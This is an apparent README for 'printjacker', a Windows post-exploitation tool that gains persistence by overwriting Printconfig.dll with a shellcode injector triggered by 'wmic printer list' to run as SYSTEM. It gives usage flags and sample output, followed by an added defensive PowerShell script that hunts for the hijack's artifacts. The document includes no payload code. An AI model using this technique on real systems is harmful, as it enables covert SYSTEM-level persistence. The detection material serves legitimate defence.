printjacker

Printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The persistence mechanism can be triggered by any user running the wmic printer list command, and the shellcode is then executed with SYSTEM privileges. Details: POST.md

[Flow diagram]

Usage

.\printjacker.exe [-find] | [-hijack] | [-execute] | [-schedule] | [-restore]
    -find     : Find the directory of Printconfig.dll
    -hijack   : Overwrite Printconfig.dll with shellcode injector and copy original to Printconfig_orig.dll
    -execute  : Hijack Printconfig.dll and execute "wmic printer list" as the current user
    -schedule : Hijack printconfig.dll and schedule "wmic printer list"
    -restore  : Restore Printconfig.dll to original

.\printjacker.exe -execute
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
...
...
[+] Resource is found. Trying to modify the target file...
[+] Original Dll is copied to Princonfig_orig.dll
[+] Printconfig.dll is successfully modified!
[*] Working in Execute mode
[*] Trying to execute payload by using "wmic printer list"...
...

.\printjacker.exe -restore
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
[+] Printconfig.dll is restored from Printconfig_orig.dll

.\printjacker.exe -find
# Printjacker - Hijack Printconfig.dll
# Author: millers-crossing
-------------------------------------------------
[*] PrintConfig.dll is found: c:\windows\system32\DriverStore\FileRepository\prnms003.inf_amd64_9d6cd193d2dd61fd\Amd64
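A defender-side check for the hijack described above, added here as an example and not part of printjacker itself: it locates every Printconfig.dll under the DriverStore, verifies its Authenticode signature, looks for the Printconfig_orig.dll backup that -hijack leaves next to the target, and lists any scheduled task whose action runs wmic with the printer alias (what -schedule sets up). It assumes an elevated PowerShell session on the host being examined; the indicator strings and the $Findings list are the example's own.

```powershell
# Added example (not printjacker's code): hunt for the artifacts the hijack leaves behind.
# Run from an elevated PowerShell session so every DriverStore path and task is visible.
$Findings = [System.Collections.Generic.List[string]]::new()
$Repo = Join-Path $env:SystemRoot 'System32\DriverStore\FileRepository'

Get-ChildItem -Path $Repo -Recurse -Filter 'Printconfig.dll' -ErrorAction SilentlyContinue |
    ForEach-Object {
        # A Printconfig.dll that has been overwritten with an injector no longer carries
        # a valid Microsoft signature; treat any status other than Valid as suspect and
        # confirm against a known-good copy of the DLL from a clean host.
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        if ($sig.Status -ne 'Valid') {
            $Findings.Add("Unsigned or modified DLL: $($_.FullName) (status: $($sig.Status))")
        }

        # -hijack copies the original DLL next to the target as Printconfig_orig.dll.
        $backup = Join-Path $_.DirectoryName 'Printconfig_orig.dll'
        if (Test-Path -Path $backup) {
            $Findings.Add("Backup artifact present: $backup")
        }
    }

# -schedule registers a task that runs "wmic printer list" to trigger the payload;
# flag any task whose action invokes wmic with the printer alias.
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmdline = "$($action.Execute) $($action.Arguments)"
        if ($cmdline -match 'wmic.*printer') {
            $Findings.Add("Scheduled task '$($task.TaskName)' runs: $cmdline")
        }
    }
}

if ($Findings.Count -eq 0) {
    Write-Output 'No printjacker indicators found.'
} else {
    $Findings | ForEach-Object { Write-Warning $_ }
}
```

A finding from the signature check alone is not proof of compromise (catalog-signed files can report differently across Windows versions), so pair it with a hash comparison against a trusted copy before restoring the DLL.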

References

Thanks to the great work of @SandboxBear, @tiraniddo, @aionescu, @yarden_shafir, @decoder_it, @spotheplanet ...

TODO